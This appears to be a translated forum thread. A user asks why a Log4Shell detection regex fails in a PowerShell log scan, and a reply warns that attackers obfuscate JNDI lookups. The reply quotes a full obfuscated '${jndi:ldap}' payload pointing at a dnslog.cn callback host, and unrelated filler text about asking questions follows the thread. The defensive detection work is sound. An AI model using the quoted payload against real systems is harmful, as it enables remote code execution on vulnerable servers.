Folosind Powershell pentru a verifica jurnalele de sistem pentru Log4Shell

Kurtz1337

16.04.2023, 11:55

În prezent, încerc să verific jurnalele pe diferite mașini Windows pentru a verifica dacă au fost executate atacuri Log4Shell împotriva sistemelor noastre. Lucrările de bază sunt făcute și pot fi verificate modele regex simple. Dacă acum folosesc regex-patternul cunoscut pentru atacurile Log4Shell, Powershell aruncă câteva erori de grupare nerecunoscute.

Regex ar trebui să arate astfel:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:lapsrm]('|"|`) ***){9,11}

Acesta este șirul pe care l-am folosit pentru Regex în Powershell cu caracterele de escape necesare:

$RX = „\$`{(\$`{(.*?:|.*?:.*?:-)('|`"|``)*(?1)}*|[jndi:lapsrm ]('|`"|``)*}*){9,11}"

Există vreo greșeală pe care am făcut-o la formatare? Sau există vreo eroare ciudată în recunoașterea Powershell Regex?

0 + 0

regex

log4j

lspci

mfinni

16.04.2023, 17:48

Nu pot comenta sintaxa dvs. regex, dar acest lucru nu este suficient. Există o mulțime de exemple pe web de oameni care folosesc diferite caractere de evadare pentru a ofusca apelul JNDI. ${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa :-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540} https://databricks.com/blog/2021/12/13/log4j2-vulnerability-cve-2021-44228-research-and-assessment.html

Răspunde

SEF 777

întrebarea această in alte limbi:

EN: Using Powershell to check System logs for Log4Shell

TH: การใช้ Powershell เพื่อตรวจสอบบันทึกของระบบสำหรับ Log4Shell

RO: Folosind Powershell pentru a verifica jurnalele de sistem pentru Log4Shell

RU: Использование Powershell для проверки системных журналов для Log4Shell

VI: Sử dụng Powershell để kiểm tra Nhật ký hệ thống cho Log4Shell

Postează un răspuns

Majoritatea oamenilor nu înțeleg că a pune multe întrebări deblochează învățarea și îmbunătățește legătura interpersonală. În studiile lui Alison, de exemplu, deși oamenii își puteau aminti cu exactitate câte întrebări au fost puse în conversațiile lor, ei nu au intuit legătura dintre întrebări și apreciere. În patru studii, în care participanții au fost implicați în conversații ei înșiși sau au citit transcrieri ale conversațiilor altora, oamenii au avut tendința să nu realizeze că întrebarea ar influența – sau ar fi influențat – nivelul de prietenie dintre conversatori.